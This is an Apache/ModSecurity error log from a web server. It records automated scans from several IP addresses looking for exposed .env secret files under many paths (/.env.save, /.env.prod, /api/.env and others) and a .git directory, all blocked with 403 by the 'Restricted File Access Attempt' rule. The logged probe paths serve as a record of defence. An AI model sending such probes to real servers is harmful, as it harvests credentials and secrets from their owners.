[Wed Feb 19 06:29:50.714008 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7VsTgzqEFiMFYV11ByxLAAAAAM"]
[Wed Feb 19 06:29:50.714325 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7VsTgzqEFiMFYV11ByxLAAAAAM"]
[Wed Feb 19 06:29:50.714616 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7VsTgzqEFiMFYV11ByxLAAAAAM"]
[Wed Feb 19 06:29:50.741643 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxLQAAAAM"]
[Wed Feb 19 06:29:50.742045 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxLQAAAAM"]
[Wed Feb 19 06:29:50.742683 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxLQAAAAM"]
[Wed Feb 19 06:29:50.772660 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxLgAAAAM"]
[Wed Feb 19 06:29:50.773040 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxLgAAAAM"]
[Wed Feb 19 06:29:50.773485 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxLgAAAAM"]
[Wed Feb 19 06:29:50.806026 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxLwAAAAM"]
[Wed Feb 19 06:29:50.806481 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxLwAAAAM"]
[Wed Feb 19 06:29:50.806967 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxLwAAAAM"]
[Wed Feb 19 06:29:50.850163 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMAAAAAM"]
[Wed Feb 19 06:29:50.850628 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMAAAAAM"]
[Wed Feb 19 06:29:50.851187 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMAAAAAM"]
[Wed Feb 19 06:29:50.877436 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMQAAAAM"]
[Wed Feb 19 06:29:50.877826 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMQAAAAM"]
[Wed Feb 19 06:29:50.878343 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMQAAAAM"]
[Wed Feb 19 06:29:50.905100 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMgAAAAM"]
[Wed Feb 19 06:29:50.905499 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMgAAAAM"]
[Wed Feb 19 06:29:50.905971 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMgAAAAM"]
[Wed Feb 19 06:29:50.932534 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMwAAAAM"]
[Wed Feb 19 06:29:50.932932 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMwAAAAM"]
[Wed Feb 19 06:29:50.933399 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7VsTgzqEFiMFYV11ByxMwAAAAM"]
[Wed Feb 19 06:29:51.025894 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "Z7VsTwzqEFiMFYV11ByxNAAAAAM"]
[Wed Feb 19 06:29:51.026327 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "Z7VsTwzqEFiMFYV11ByxNAAAAAM"]
[Wed Feb 19 06:29:51.026847 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "Z7VsTwzqEFiMFYV11ByxNAAAAAM"]
[Wed Feb 19 14:51:08.098362 2025] [authz_core:error] [pid 1259203] [client 57.180.240.215:37058] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Feb 19 23:28:55.682213 2025] [:error] [pid 1259203] [client 45.148.10.166:8682] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7ZbJ8O0jkjfdQXx8it8RQAAAAg"], referer: https://www.google.com/
[Wed Feb 19 23:28:55.683292 2025] [:error] [pid 1259203] [client 45.148.10.166:8682] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7ZbJ8O0jkjfdQXx8it8RQAAAAg"], referer: https://www.google.com/
[Wed Feb 19 23:28:55.683738 2025] [:error] [pid 1259203] [client 45.148.10.166:8682] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7ZbJ8O0jkjfdQXx8it8RQAAAAg"], referer: https://www.google.com/
[Wed Feb 19 23:28:55.903654 2025] [:error] [pid 1259202] [client 45.148.10.166:8686] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7ZbJ7fTDZoQXGqhAzbF8AAAAAc"], referer: https://www.google.com/
[Wed Feb 19 23:28:55.904633 2025] [:error] [pid 1259202] [client 45.148.10.166:8686] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7ZbJ7fTDZoQXGqhAzbF8AAAAAc"], referer: https://www.google.com/
[Wed Feb 19 23:28:55.905079 2025] [:error] [pid 1259202] [client 45.148.10.166:8686] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7ZbJ7fTDZoQXGqhAzbF8AAAAAc"], referer: https://www.google.com/
[Wed Feb 19 23:28:56.651598 2025] [:error] [pid 1259335] [client 45.148.10.166:8722] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7ZbKIC8jifnO0kJgZgwbgAAAAk"], referer: https://www.google.com/
[Wed Feb 19 23:28:56.652663 2025] [:error] [pid 1259335] [client 45.148.10.166:8722] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7ZbKIC8jifnO0kJgZgwbgAAAAk"], referer: https://www.google.com/
[Wed Feb 19 23:28:56.653159 2025] [:error] [pid 1259335] [client 45.148.10.166:8722] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7ZbKIC8jifnO0kJgZgwbgAAAAk"], referer: https://www.google.com/
[Wed Feb 19 23:28:56.869076 2025] [:error] [pid 1258425] [client 45.148.10.166:8724] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7ZbKCMcT3_Z2BZK5CWdYQAAAAU"], referer: https://www.google.com/
[Wed Feb 19 23:28:56.869995 2025] [:error] [pid 1258425] [client 45.148.10.166:8724] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7ZbKCMcT3_Z2BZK5CWdYQAAAAU"], referer: https://www.google.com/
[Wed Feb 19 23:28:56.870460 2025] [:error] [pid 1258425] [client 45.148.10.166:8724] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7ZbKCMcT3_Z2BZK5CWdYQAAAAU"], referer: https://www.google.com/
[Wed Feb 19 23:28:57.114509 2025] [:error] [pid 1258386] [client 45.148.10.166:16506] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z7ZbKaAIC5wiEYk6JNGCiAAAAAE"], referer: https://www.google.com/
